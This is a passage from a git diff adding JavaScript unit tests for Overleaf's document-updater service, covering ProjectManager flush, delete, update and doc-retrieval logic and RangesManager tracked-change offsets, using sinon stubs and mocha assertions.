return this.ProjectManager.flushAndDeleteProjectWithLocks( + this.project_id, + {}, + error => { + this.callback(error) + return done() + } + ) + }) + + it('should get the doc ids in the project', function () { + return this.RedisManager.getDocIdsInProject + .calledWith(this.project_id) + .should.equal(true) + }) + + it('should delete each doc in the project', function () { + return Array.from(this.doc_ids).map(docId => + this.DocumentManager.flushAndDeleteDocWithLock + .calledWith(this.project_id, docId, {}) + .should.equal(true) + ) + }) + + it('should flush project history', function () { + return this.HistoryManager.flushProjectChanges + .calledWith(this.project_id, {}) + .should.equal(true) + }) + + it('should call the callback without error', function () { + return this.callback.calledWith(null).should.equal(true) + }) + + return it('should time the execution', function () { + return this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + }) + + return describe('when a doc errors', function () { + beforeEach(function (done) { + this.doc_ids = ['doc-id-1', 'doc-id-2', 'doc-id-3'] + this.RedisManager.getDocIdsInProject = sinon + .stub() + .callsArgWith(1, null, this.doc_ids) + this.DocumentManager.flushAndDeleteDocWithLock = sinon.spy( + (projectId, docId, options, callback) => { + if (docId === 'doc-id-1') { + return callback( + (this.error = new Error('oops, something went wrong')) + ) + } else { + return callback() + } + } + ) + return this.ProjectManager.flushAndDeleteProjectWithLocks( + this.project_id, + {}, + error => { + this.callback(error) + return done() + } + ) + }) + + it('should still flush each doc in the project', function () { + return Array.from(this.doc_ids).map(docId => + this.DocumentManager.flushAndDeleteDocWithLock + .calledWith(this.project_id, docId, {}) + .should.equal(true) + ) + }) + + it('should still flush project history', 
function () { + return this.HistoryManager.flushProjectChanges + .calledWith(this.project_id, {}) + .should.equal(true) + }) + + it('should record the error', function () { + return this.logger.error + .calledWith( + { err: this.error, projectId: this.project_id, docId: 'doc-id-1' }, + 'error deleting doc' + ) + .should.equal(true) + }) + + it('should call the callback with an error', function () { + return this.callback + .calledWith(sinon.match.instanceOf(Error)) + .should.equal(true) + }) + + return it('should time the execution', function () { + return this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + }) +}) diff --git a/services/document-updater/test/unit/js/ProjectManager/flushProjectTests.js b/services/document-updater/test/unit/js/ProjectManager/flushProjectTests.js new file mode 100644 index 0000000..7eea0d2 --- /dev/null +++ b/services/document-updater/test/unit/js/ProjectManager/flushProjectTests.js @@ -0,0 +1,145 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS206: Consider reworking classes to avoid initClass + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const modulePath = '../../../../app/js/ProjectManager.js' +const SandboxedModule = require('sandboxed-module') + +describe('ProjectManager - flushProject', function () { + beforeEach(function () { + let Timer + this.LockManager = { + getLock: sinon.stub().yields(), + releaseLock: sinon.stub().yields(), + } + this.ProjectManager = SandboxedModule.require(modulePath, { + requires: { + './RedisManager': (this.RedisManager = {}), + './ProjectHistoryRedisManager': (this.ProjectHistoryRedisManager = {}), + './DocumentManager': (this.DocumentManager = {}), + './HistoryManager': (this.HistoryManager = {}), + './LockManager': this.LockManager, + './Metrics': (this.Metrics = { + Timer: (Timer = (function () { + Timer = class Timer { + static initClass() { + this.prototype.done = sinon.stub() + } + } + Timer.initClass() + return Timer + })()), + }), + }, + }) + this.project_id = 'project-id-123' + return (this.callback = sinon.stub()) + }) + + describe('successfully', function () { + beforeEach(function (done) { + this.doc_ids = ['doc-id-1', 'doc-id-2', 'doc-id-3'] + this.RedisManager.getDocIdsInProject = sinon + .stub() + .callsArgWith(1, null, this.doc_ids) + this.DocumentManager.flushDocIfLoadedWithLock = sinon.stub().callsArg(2) + return this.ProjectManager.flushProjectWithLocks( + this.project_id, + error => { + this.callback(error) + return done() + } + ) + }) + + it('should get the doc ids in the project', function () { + return this.RedisManager.getDocIdsInProject + .calledWith(this.project_id) + .should.equal(true) + }) + + it('should flush each doc in the project', function () { + return Array.from(this.doc_ids).map(docId => + this.DocumentManager.flushDocIfLoadedWithLock + .calledWith(this.project_id, docId) + .should.equal(true) + ) + }) + + it('should call the callback without error', function () { + return this.callback.calledWith(null).should.equal(true) + }) + + return it('should time the execution', function () { + return this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + }) + + 
return describe('when a doc errors', function () { + beforeEach(function (done) { + this.doc_ids = ['doc-id-1', 'doc-id-2', 'doc-id-3'] + this.RedisManager.getDocIdsInProject = sinon + .stub() + .callsArgWith(1, null, this.doc_ids) + this.DocumentManager.flushDocIfLoadedWithLock = sinon.spy( + (projectId, docId, callback) => { + if (callback == null) { + callback = function () {} + } + if (docId === 'doc-id-1') { + return callback( + (this.error = new Error('oops, something went wrong')) + ) + } else { + return callback() + } + } + ) + return this.ProjectManager.flushProjectWithLocks( + this.project_id, + error => { + this.callback(error) + return done() + } + ) + }) + + it('should still flush each doc in the project', function () { + return Array.from(this.doc_ids).map(docId => + this.DocumentManager.flushDocIfLoadedWithLock + .calledWith(this.project_id, docId) + .should.equal(true) + ) + }) + + it('should record the error', function () { + return this.logger.error + .calledWith( + { err: this.error, projectId: this.project_id, docId: 'doc-id-1' }, + 'error flushing doc' + ) + .should.equal(true) + }) + + it('should call the callback with an error', function () { + return this.callback + .calledWith(sinon.match.instanceOf(Error)) + .should.equal(true) + }) + + return it('should time the execution', function () { + return this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + }) +}) diff --git a/services/document-updater/test/unit/js/ProjectManager/getProjectDocsTests.js b/services/document-updater/test/unit/js/ProjectManager/getProjectDocsTests.js new file mode 100644 index 0000000..1a04d71 --- /dev/null +++ b/services/document-updater/test/unit/js/ProjectManager/getProjectDocsTests.js @@ -0,0 +1,224 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
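+// For example, the DS206 initClass pattern used for the Metrics Timer stub, +// Timer = class Timer { static initClass() { this.prototype.done = sinon.stub() } } +// Timer.initClass() +// could be reworked (a sketch only) as a plain class with a stubbed prototype: +// class Timer {} +// Timer.prototype.done = sinon.stub()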
+/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS206: Consider reworking classes to avoid initClass + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const modulePath = '../../../../app/js/ProjectManager.js' +const SandboxedModule = require('sandboxed-module') +const Errors = require('../../../../app/js/Errors.js') + +describe('ProjectManager - getProjectDocsAndFlushIfOld', function () { + beforeEach(function () { + let Timer + this.LockManager = { + getLock: sinon.stub().yields(), + releaseLock: sinon.stub().yields(), + } + this.ProjectManager = SandboxedModule.require(modulePath, { + requires: { + './RedisManager': (this.RedisManager = {}), + './ProjectHistoryRedisManager': (this.ProjectHistoryRedisManager = {}), + './DocumentManager': (this.DocumentManager = {}), + './HistoryManager': (this.HistoryManager = {}), + './LockManager': this.LockManager, + './Metrics': (this.Metrics = { + Timer: (Timer = (function () { + Timer = class Timer { + static initClass() { + this.prototype.done = sinon.stub() + } + } + Timer.initClass() + return Timer + })()), + }), + './Errors': Errors, + }, + }) + this.project_id = 'project-id-123' + this.callback = sinon.stub() + return (this.doc_versions = [111, 222, 333]) + }) + + describe('successfully', function () { + beforeEach(function (done) { + this.doc_ids = ['doc-id-1', 'doc-id-2', 'doc-id-3'] + this.doc_lines = [ + ['aaa', 'aaa'], + ['bbb', 'bbb'], + ['ccc', 'ccc'], + ] + this.docs = [ + { + _id: this.doc_ids[0], + lines: this.doc_lines[0], + v: this.doc_versions[0], + }, + { + _id: this.doc_ids[1], + lines: this.doc_lines[1], + v: this.doc_versions[1], + }, + { + _id: this.doc_ids[2], + lines: this.doc_lines[2], + v: this.doc_versions[2], + }, + ] + this.RedisManager.checkOrSetProjectState = sinon + .stub() + .callsArgWith(2, null) + this.RedisManager.getDocIdsInProject = sinon + .stub() + .callsArgWith(1, null, this.doc_ids) + this.DocumentManager.getDocAndFlushIfOldWithLock = sinon.stub() + this.DocumentManager.getDocAndFlushIfOldWithLock + .withArgs(this.project_id, this.doc_ids[0]) + .callsArgWith(2, null, this.doc_lines[0], this.doc_versions[0]) + this.DocumentManager.getDocAndFlushIfOldWithLock + .withArgs(this.project_id, this.doc_ids[1]) + .callsArgWith(2, null, this.doc_lines[1], this.doc_versions[1]) + this.DocumentManager.getDocAndFlushIfOldWithLock + .withArgs(this.project_id, this.doc_ids[2]) + .callsArgWith(2, null, this.doc_lines[2], this.doc_versions[2]) + return this.ProjectManager.getProjectDocsAndFlushIfOld( + this.project_id, + this.projectStateHash, + this.excludeVersions, + (error, docs) => { + this.callback(error, docs) + return done() + } + ) + }) + + it('should check the project state', function () { + return this.RedisManager.checkOrSetProjectState + .calledWith(this.project_id, this.projectStateHash) + .should.equal(true) + }) + + it('should get the doc ids in the project', function () { + return this.RedisManager.getDocIdsInProject + .calledWith(this.project_id) + .should.equal(true) + }) + + it('should call the callback without error', function () { + return this.callback.calledWith(null, this.docs).should.equal(true) + }) + + return it('should time the execution', function () { + return this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + }) + + describe('when the state does not match', function () { + beforeEach(function (done) { + this.doc_ids = ['doc-id-1', 
'doc-id-2', 'doc-id-3'] + this.RedisManager.checkOrSetProjectState = sinon + .stub() + .callsArgWith(2, null, true) + return this.ProjectManager.getProjectDocsAndFlushIfOld( + this.project_id, + this.projectStateHash, + this.excludeVersions, + (error, docs) => { + this.callback(error, docs) + return done() + } + ) + }) + + it('should check the project state', function () { + return this.RedisManager.checkOrSetProjectState + .calledWith(this.project_id, this.projectStateHash) + .should.equal(true) + }) + + it('should call the callback with an error', function () { + return this.callback + .calledWith(sinon.match.instanceOf(Errors.ProjectStateChangedError)) + .should.equal(true) + }) + + return it('should time the execution', function () { + return this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + }) + + describe('when a doc errors', function () { + beforeEach(function (done) { + this.doc_ids = ['doc-id-1', 'doc-id-2', 'doc-id-3'] + this.RedisManager.checkOrSetProjectState = sinon + .stub() + .callsArgWith(2, null) + this.RedisManager.getDocIdsInProject = sinon + .stub() + .callsArgWith(1, null, this.doc_ids) + this.DocumentManager.getDocAndFlushIfOldWithLock = sinon.stub() + this.DocumentManager.getDocAndFlushIfOldWithLock + .withArgs(this.project_id, 'doc-id-1') + .callsArgWith(2, null, ['test doc content'], this.doc_versions[1]) + this.DocumentManager.getDocAndFlushIfOldWithLock + .withArgs(this.project_id, 'doc-id-2') + .callsArgWith(2, (this.error = new Error('oops'))) // trigger an error + return this.ProjectManager.getProjectDocsAndFlushIfOld( + this.project_id, + this.projectStateHash, + this.excludeVersions, + (error, docs) => { + this.callback(error) + return done() + } + ) + }) + + it('should record the error', function () { + return this.logger.error + .calledWith( + { err: this.error, projectId: this.project_id, docId: 'doc-id-2' }, + 'error getting project doc lines in getProjectDocsAndFlushIfOld' + ) + .should.equal(true) + }) + + it('should call the callback with an error', function () { + return this.callback + .calledWith(sinon.match.instanceOf(Error)) + .should.equal(true) + }) + + return it('should time the execution', function () { + return this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + }) + + return describe('clearing the project state with clearProjectState', function () { + beforeEach(function (done) { + this.RedisManager.clearProjectState = sinon.stub().callsArg(1) + return this.ProjectManager.clearProjectState(this.project_id, error => { + this.callback(error) + return done() + }) + }) + + it('should clear the project state', function () { + return this.RedisManager.clearProjectState + .calledWith(this.project_id) + .should.equal(true) + }) + + return it('should call the callback', function () { + return this.callback.called.should.equal(true) + }) + }) +}) diff --git a/services/document-updater/test/unit/js/ProjectManager/updateProjectTests.js b/services/document-updater/test/unit/js/ProjectManager/updateProjectTests.js new file mode 100644 index 0000000..6db8317 --- /dev/null +++ b/services/document-updater/test/unit/js/ProjectManager/updateProjectTests.js @@ -0,0 +1,417 @@ +const sinon = require('sinon') +const modulePath = '../../../../app/js/ProjectManager.js' +const SandboxedModule = require('sandboxed-module') +const _ = require('lodash') + +describe('ProjectManager', function () { + beforeEach(function () { + this.RedisManager = {} + this.ProjectHistoryRedisManager = { + queueRenameEntity: sinon.stub().yields(), + 
queueAddEntity: sinon.stub().yields(), + } + this.DocumentManager = { + renameDocWithLock: sinon.stub().yields(), + } + this.HistoryManager = { + flushProjectChangesAsync: sinon.stub(), + shouldFlushHistoryOps: sinon.stub().returns(false), + } + this.LockManager = { + getLock: sinon.stub().yields(), + releaseLock: sinon.stub().yields(), + } + this.Metrics = { + Timer: class Timer {}, + } + this.Metrics.Timer.prototype.done = sinon.stub() + + this.ProjectManager = SandboxedModule.require(modulePath, { + requires: { + './RedisManager': this.RedisManager, + './ProjectHistoryRedisManager': this.ProjectHistoryRedisManager, + './DocumentManager': this.DocumentManager, + './HistoryManager': this.HistoryManager, + './LockManager': this.LockManager, + './Metrics': this.Metrics, + }, + }) + + this.project_id = 'project-id-123' + this.projectHistoryId = 'history-id-123' + this.user_id = 'user-id-123' + this.version = 1234567 + this.source = 'editor' + this.callback = sinon.stub() + }) + + describe('updateProjectWithLocks', function () { + describe('rename operations', function () { + beforeEach(function () { + this.firstDocUpdate = { + type: 'rename-doc', + id: 1, + pathname: 'foo', + newPathname: 'foo', + } + this.secondDocUpdate = { + type: 'rename-doc', + id: 2, + pathname: 'bar', + newPathname: 'bar2', + } + this.firstFileUpdate = { + type: 'rename-file', + id: 2, + pathname: 'bar', + newPathname: 'bar2', + } + this.updates = [ + this.firstDocUpdate, + this.secondDocUpdate, + this.firstFileUpdate, + ] + }) + + describe('successfully', function () { + beforeEach(function () { + this.ProjectManager.updateProjectWithLocks( + this.project_id, + this.projectHistoryId, + this.user_id, + this.updates, + this.version, + this.source, + this.callback + ) + }) + + it('should rename the docs in the updates', function () { + const firstDocUpdateWithVersion = _.extend({}, this.firstDocUpdate, { + version: `${this.version}.0`, + }) + const secondDocUpdateWithVersion = _.extend( + {}, + this.secondDocUpdate, + { version: `${this.version}.1` } + ) + this.DocumentManager.renameDocWithLock + .calledWith( + this.project_id, + this.firstDocUpdate.id, + this.user_id, + firstDocUpdateWithVersion, + this.projectHistoryId + ) + .should.equal(true) + this.DocumentManager.renameDocWithLock + .calledWith( + this.project_id, + this.secondDocUpdate.id, + this.user_id, + secondDocUpdateWithVersion, + this.projectHistoryId + ) + .should.equal(true) + }) + + it('should rename the files in the updates', function () { + const firstFileUpdateWithVersion = _.extend( + {}, + this.firstFileUpdate, + { version: `${this.version}.2` } + ) + this.ProjectHistoryRedisManager.queueRenameEntity + .calledWith( + this.project_id, + this.projectHistoryId, + 'file', + this.firstFileUpdate.id, + this.user_id, + firstFileUpdateWithVersion, + this.source + ) + .should.equal(true) + }) + + it('should not flush the history', function () { + this.HistoryManager.flushProjectChangesAsync + .calledWith(this.project_id) + .should.equal(false) + }) + + it('should call the callback', function () { + this.callback.called.should.equal(true) + }) + }) + + describe('when renaming a doc fails', function () { + beforeEach(function () { + this.error = new Error('error') + this.DocumentManager.renameDocWithLock.yields(this.error) + this.ProjectManager.updateProjectWithLocks( + this.project_id, + this.projectHistoryId, + this.user_id, + this.updates, + this.version, + this.source, + this.callback + ) + }) + + it('should call the callback with the error', function () 
{ + this.callback.calledWith(this.error).should.equal(true) + }) + }) + + describe('when renaming a file fails', function () { + beforeEach(function () { + this.error = new Error('error') + this.ProjectHistoryRedisManager.queueRenameEntity.yields(this.error) + this.ProjectManager.updateProjectWithLocks( + this.project_id, + this.projectHistoryId, + this.user_id, + this.updates, + this.version, + this.source, + this.callback + ) + }) + + it('should call the callback with the error', function () { + this.callback.calledWith(this.error).should.equal(true) + }) + }) + + describe('with enough ops to flush', function () { + beforeEach(function () { + this.HistoryManager.shouldFlushHistoryOps.returns(true) + this.ProjectManager.updateProjectWithLocks( + this.project_id, + this.projectHistoryId, + this.user_id, + this.updates, + this.version, + this.source, + this.callback + ) + }) + + it('should flush the history', function () { + this.HistoryManager.flushProjectChangesAsync + .calledWith(this.project_id) + .should.equal(true) + }) + }) + }) + + describe('add operations', function () { + beforeEach(function () { + this.firstDocUpdate = { + type: 'add-doc', + id: 1, + docLines: 'a\nb', + } + this.secondDocUpdate = { + type: 'add-doc', + id: 2, + docLines: 'a\nb', + } + this.firstFileUpdate = { + type: 'add-file', + id: 3, + url: 'filestore.example.com/2', + } + this.secondFileUpdate = { + type: 'add-file', + id: 4, + url: 'filestore.example.com/3', + } + this.updates = [ + this.firstDocUpdate, + this.secondDocUpdate, + this.firstFileUpdate, + this.secondFileUpdate, + ] + }) + + describe('successfully', function () { + beforeEach(function () { + this.ProjectManager.updateProjectWithLocks( + this.project_id, + this.projectHistoryId, + this.user_id, + this.updates, + this.version, + this.source, + this.callback + ) + }) + + it('should add the docs in the updates', function () { + const firstDocUpdateWithVersion = _.extend({}, this.firstDocUpdate, { + version: `${this.version}.0`, + }) + const secondDocUpdateWithVersion = _.extend( + {}, + this.secondDocUpdate, + { version: `${this.version}.1` } + ) + this.ProjectHistoryRedisManager.queueAddEntity + .getCall(0) + .calledWith( + this.project_id, + this.projectHistoryId, + 'doc', + this.firstDocUpdate.id, + this.user_id, + firstDocUpdateWithVersion, + this.source + ) + .should.equal(true) + this.ProjectHistoryRedisManager.queueAddEntity + .getCall(1) + .calledWith( + this.project_id, + this.projectHistoryId, + 'doc', + this.secondDocUpdate.id, + this.user_id, + secondDocUpdateWithVersion, + this.source + ) + .should.equal(true) + }) + + it('should add the files in the updates', function () { + const firstFileUpdateWithVersion = _.extend( + {}, + this.firstFileUpdate, + { version: `${this.version}.2` } + ) + const secondFileUpdateWithVersion = _.extend( + {}, + this.secondFileUpdate, + { version: `${this.version}.3` } + ) + this.ProjectHistoryRedisManager.queueAddEntity + .getCall(2) + .calledWith( + this.project_id, + this.projectHistoryId, + 'file', + this.firstFileUpdate.id, + this.user_id, + firstFileUpdateWithVersion, + this.source + ) + .should.equal(true) + this.ProjectHistoryRedisManager.queueAddEntity + .getCall(3) + .calledWith( + this.project_id, + this.projectHistoryId, + 'file', + this.secondFileUpdate.id, + this.user_id, + secondFileUpdateWithVersion, + this.source + ) + .should.equal(true) + }) + + it('should not flush the history', function () { + this.HistoryManager.flushProjectChangesAsync + .calledWith(this.project_id) + 
.should.equal(false) + }) + + it('should call the callback', function () { + this.callback.called.should.equal(true) + }) + }) + + describe('when adding a doc fails', function () { + beforeEach(function () { + this.error = new Error('error') + this.ProjectHistoryRedisManager.queueAddEntity.yields(this.error) + this.ProjectManager.updateProjectWithLocks( + this.project_id, + this.projectHistoryId, + this.user_id, + this.updates, + this.version, + this.source, + this.callback + ) + }) + + it('should call the callback with the error', function () { + this.callback.calledWith(this.error).should.equal(true) + }) + }) + + describe('when adding a file fails', function () { + beforeEach(function () { + this.error = new Error('error') + this.ProjectHistoryRedisManager.queueAddEntity.yields(this.error) + this.ProjectManager.updateProjectWithLocks( + this.project_id, + this.projectHistoryId, + this.user_id, + this.updates, + this.version, + this.source, + this.callback + ) + }) + + it('should call the callback with the error', function () { + this.callback.calledWith(this.error).should.equal(true) + }) + }) + + describe('with enough ops to flush', function () { + beforeEach(function () { + this.HistoryManager.shouldFlushHistoryOps.returns(true) + this.ProjectManager.updateProjectWithLocks( + this.project_id, + this.projectHistoryId, + this.user_id, + this.updates, + this.version, + this.source, + this.callback + ) + }) + + it('should flush the history', function () { + this.HistoryManager.flushProjectChangesAsync + .calledWith(this.project_id) + .should.equal(true) + }) + }) + }) + + describe('when given an unknown operation type', function () { + beforeEach(function () { + this.updates = [{ type: 'brew-coffee' }] + this.ProjectManager.updateProjectWithLocks( + this.project_id, + this.projectHistoryId, + this.user_id, + this.updates, + this.version, + this.source, + this.callback + ) + }) + + it('should call back with an error', function () { + this.callback.calledWith(sinon.match.instanceOf(Error)).should.be.true + }) + }) + }) +}) diff --git a/services/document-updater/test/unit/js/RangesManager/RangesManagerTests.js b/services/document-updater/test/unit/js/RangesManager/RangesManagerTests.js new file mode 100644 index 0000000..4053aaf --- /dev/null +++ b/services/document-updater/test/unit/js/RangesManager/RangesManagerTests.js @@ -0,0 +1,1089 @@ +const sinon = require('sinon') +const { expect } = require('chai') +const SandboxedModule = require('sandboxed-module') + +const MODULE_PATH = '../../../../app/js/RangesManager.js' +const TEST_USER_ID = 'user-id-123' + +describe('RangesManager', function () { + beforeEach(function () { + this.RangesManager = SandboxedModule.require(MODULE_PATH, { + requires: { + '@overleaf/metrics': (this.Metrics = { histogram: sinon.stub() }), + }, + }) + + this.doc_id = 'doc-id-123' + this.project_id = 'project-id-123' + this.user_id = TEST_USER_ID + }) + + describe('applyUpdate', function () { + beforeEach(function () { + this.ops = [{ i: 'two ', p: 4 }] + this.historyOps = [{ i: 'two ', p: 4, hpos: 4 }] + this.meta = { user_id: this.user_id } + this.updates = [{ meta: this.meta, op: this.ops }] + this.ranges = { + comments: makeRanges([{ c: 'three ', p: 4 }]), + changes: makeRanges([{ i: 'five', p: 15 }]), + } + this.newDocLines = ['one two three four five'] + // old is "one three four five" + }) + + describe('successfully', function () { + beforeEach(function () { + this.result = this.RangesManager.applyUpdate( + this.project_id, + this.doc_id, + this.ranges, + 
this.updates, + this.newDocLines + ) + }) + + it('should return the modified comments and changes', function () { + expect(this.result.rangesWereCollapsed).to.equal(false) + this.result.newRanges.comments[0].op.should.deep.equal({ + c: 'three ', + p: 8, + }) + this.result.newRanges.changes[0].op.should.deep.equal({ + i: 'five', + p: 19, + }) + }) + + it('should return unmodified updates for the history', function () { + expect(this.result.historyUpdates).to.deep.equal(this.updates) + }) + }) + + describe('with empty comments', function () { + beforeEach(function () { + this.ranges.comments = [] + this.result = this.RangesManager.applyUpdate( + this.project_id, + this.doc_id, + this.ranges, + this.updates, + this.newDocLines + ) + }) + + it('should return an object with no comments', function () { + // Save space in redis and don't store just {} + expect(this.result.newRanges.comments).to.be.undefined + }) + + it('should return unmodified updates for the history', function () { + expect(this.result.historyUpdates).to.deep.equal(this.updates) + }) + }) + + describe('with empty changes', function () { + beforeEach(function () { + this.ranges.changes = [] + this.result = this.RangesManager.applyUpdate( + this.project_id, + this.doc_id, + this.ranges, + this.updates, + this.newDocLines + ) + }) + + it('should return an object with no changes', function () { + // Save space in redis and don't store just {} + expect(this.result.newRanges.changes).to.be.undefined + }) + + it('should return unmodified updates for the history', function () { + expect(this.result.historyUpdates).to.deep.equal(this.updates) + }) + }) + + describe('with too many comments', function () { + beforeEach(function () { + this.RangesManager.MAX_COMMENTS = 2 + this.updates = makeUpdates([{ c: 'one', p: 0, t: 'thread-id-1' }]) + this.ranges = { + comments: makeRanges([ + { c: 'three ', p: 4, t: 'thread-id-2' }, + { c: 'four ', p: 10, t: 'thread-id-3' }, + ]), + changes: [], + } + }) + + it('should throw an error', function () { + expect(() => { + this.RangesManager.applyUpdate( + this.project_id, + this.doc_id, + this.ranges, + this.updates, + this.newDocLines + ) + }).to.throw('too many comments or tracked changes') + }) + }) + + describe('with too many changes', function () { + beforeEach(function () { + this.RangesManager.MAX_CHANGES = 2 + this.updates = makeUpdates([{ i: 'one ', p: 0 }], { + tc: 'track-changes-id-yes', + }) + this.ranges = { + changes: makeRanges([ + { + i: 'three', + p: 4, + }, + { + i: 'four', + p: 10, + }, + ]), + comments: [], + } + this.newDocLines = ['one two three four'] + }) + + it('should throw an error', function () { + expect(() => { + this.RangesManager.applyUpdate( + this.project_id, + this.doc_id, + this.ranges, + this.updates, + this.newDocLines + ) + }).to.throw('too many comments or tracked changes') + }) + }) + + describe('inconsistent changes', function () { + beforeEach(function () { + this.updates = makeUpdates([{ c: "doesn't match", p: 0 }]) + }) + + it('should throw an error', function () { + expect(() => { + this.RangesManager.applyUpdate( + this.project_id, + this.doc_id, + this.ranges, + this.updates, + this.newDocLines + ) + }).to.throw('insertion does not match text in document') + }) + }) + + describe('with an update that collapses a range', function () { + beforeEach(function () { + this.updates = makeUpdates([{ d: 'one', p: 0, t: 'thread-id-1' }]) + this.ranges = { + comments: makeRanges([ + { + c: 'n', + p: 1, + t: 'thread-id-2', + }, + ]), + changes: [], + } + 
this.result = this.RangesManager.applyUpdate( + this.project_id, + this.doc_id, + this.ranges, + this.updates, + this.newDocLines + ) + }) + + it('should return ranges_were_collapsed == true', function () { + expect(this.result.rangesWereCollapsed).to.equal(true) + }) + }) + + describe('with an update that deletes ranges', function () { + beforeEach(function () { + this.updates = makeUpdates([{ d: 'one two three four five', p: 0 }]) + this.ranges = { + comments: makeRanges([{ c: 'n', p: 1, t: 'thread-id-2' }]), + changes: makeRanges([{ i: 'hello', p: 1, t: 'thread-id-2' }]), + } + this.result = this.RangesManager.applyUpdate( + this.project_id, + this.doc_id, + this.ranges, + this.updates, + this.newDocLines + ) + }) + + it('should increment the range-delta histogram', function () { + this.Metrics.histogram.called.should.equal(true) + }) + + it('should return ranges_were_collapsed == true', function () { + expect(this.result.rangesWereCollapsed).to.equal(true) + }) + }) + + describe('with comment updates', function () { + beforeEach(function () { + this.updates = makeUpdates([ + { i: 'two ', p: 4 }, + { c: 'one', p: 0 }, + ]) + this.ranges = {} + this.result = this.RangesManager.applyUpdate( + this.project_id, + this.doc_id, + this.ranges, + this.updates, + this.newDocLines + ) + }) + + it('should not send comments to the history', function () { + expect(this.result.historyUpdates[0].op).to.deep.equal([ + { i: 'two ', p: 4 }, + ]) + }) + }) + + describe('with history ranges support', function () { + describe('inserts among tracked deletes', function () { + beforeEach(function () { + // original text is "on[1]e[22] [333](three) fo[4444]ur five" + // [] denotes tracked deletes + // () denotes tracked inserts + this.ranges = { + changes: makeRanges([ + { d: '1', p: 2 }, + { d: '22', p: 3 }, + { d: '333', p: 4 }, + { i: 'three', p: 4 }, + { d: '4444', p: 12 }, + ]), + } + this.updates = makeUpdates([ + { i: 'zero ', p: 0 }, + { i: 'two ', p: 9, u: true }, + ]) + this.newDocLines = ['zero one two three four five'] + this.result = this.RangesManager.applyUpdate( + this.project_id, + this.doc_id, + this.ranges, + this.updates, + this.newDocLines, + { historyRangesSupport: true } + ) + }) + + it('should offset the hpos by the length of tracked deletes before the insert', function () { + expect(this.result.historyUpdates.map(x => x.op)).to.deep.equal([ + [{ i: 'zero ', p: 0 }], + // 'two' is added just before the "333" tracked delete + [{ i: 'two ', p: 9, u: true, hpos: 12 }], + ]) + }) + }) + + describe('tracked delete rejections', function () { + beforeEach(function () { + // original text is "one [two ]three four five" + // [] denotes tracked deletes + this.ranges = { + changes: makeRanges([{ d: 'two ', p: 4 }]), + } + this.updates = makeUpdates([{ i: 'tw', p: 4, u: true }]) + this.newDocLines = ['one twthree four five'] + this.result = this.RangesManager.applyUpdate( + this.project_id, + this.doc_id, + this.ranges, + this.updates, + this.newDocLines, + { historyRangesSupport: true } + ) + }) + + it('should mark the insert as a tracked delete rejection where appropriate', function () { + expect(this.result.historyUpdates.map(x => x.op)).to.deep.equal([ + [{ i: 'tw', p: 4, u: true, trackedDeleteRejection: true }], + ]) + }) + }) + + describe('tracked delete rejections with multiple tracked deletes at the same position', function () { + beforeEach(function () { + // original text is "one [two ][three ][four ]five" + // [] denotes tracked deletes + this.ranges = { + changes: makeRanges([ + { d: 
'two ', p: 4 }, + { d: 'three ', p: 4 }, + { d: 'four ', p: 4 }, + ]), + } + this.updates = makeUpdates([{ i: 'three ', p: 4, u: true }]) + this.newDocLines = ['one three five'] + this.result = this.RangesManager.applyUpdate( + this.project_id, + this.doc_id, + this.ranges, + this.updates, + this.newDocLines, + { historyRangesSupport: true } + ) + }) + + it('should insert the text at the right history position', function () { + expect(this.result.historyUpdates.map(x => x.op)).to.deep.equal([ + [ + { + i: 'three ', + p: 4, + hpos: 8, + u: true, + trackedDeleteRejection: true, + }, + ], + ]) + }) + }) + + describe('deletes over tracked changes', function () { + beforeEach(function () { + // original text is "on[1]e [22](three) f[333]ou[4444]r [55555]five" + // [] denotes tracked deletes + // () denotes tracked inserts + this.ranges = { + comments: [], + changes: makeRanges([ + { d: '1', p: 2 }, + { d: '22', p: 4 }, + { i: 'three', p: 4 }, + { d: '333', p: 11 }, + { d: '4444', p: 13 }, + { d: '55555', p: 15 }, + ]), + } + this.updates = makeUpdates([ + { d: 'four ', p: 10 }, + { d: 'three ', p: 4 }, + ]) + this.newDocLines = ['one five'] + this.result = this.RangesManager.applyUpdate( + this.project_id, + this.doc_id, + this.ranges, + this.updates, + this.newDocLines, + { historyRangesSupport: true } + ) + }) + + it('should split and offset deletes appropriately', function () { + expect(this.result.historyUpdates.map(x => x.op)).to.deep.equal([ + [ + // the "four" delete has tracked deletes inside it, add splits + { + d: 'four ', + p: 10, + hpos: 13, + trackedChanges: [ + { type: 'delete', offset: 1, length: 3 }, + { type: 'delete', offset: 3, length: 4 }, + ], + }, + ], + + // the "three" delete is offset to the right by the two first tracked + // deletes + [ + { + d: 'three ', + p: 4, + hpos: 7, + trackedChanges: [{ type: 'insert', offset: 0, length: 5 }], + }, + ], + ]) + }) + }) + + describe('deletes that overlap tracked inserts', function () { + beforeEach(function () { + // original text is "(one) (three) (four) five" + // [] denotes tracked deletes + // () denotes tracked inserts + this.ranges = { + comments: [], + changes: makeRanges([ + { i: 'one', p: 0 }, + { i: 'three', p: 4 }, + { i: 'four', p: 10 }, + ]), + } + this.updates = makeUpdates( + [ + { d: 'ne th', p: 1 }, + { d: 'ou', p: 6 }, + ], + { tc: 'tracked-change-id' } + ) + this.newDocLines = ['oree fr five'] + this.result = this.RangesManager.applyUpdate( + this.project_id, + this.doc_id, + this.ranges, + this.updates, + this.newDocLines, + { historyRangesSupport: true } + ) + }) + + it('should split and offset deletes appropriately', function () { + expect(this.result.historyUpdates.map(x => x.op)).to.deep.equal([ + [ + { + d: 'ne th', + p: 1, + 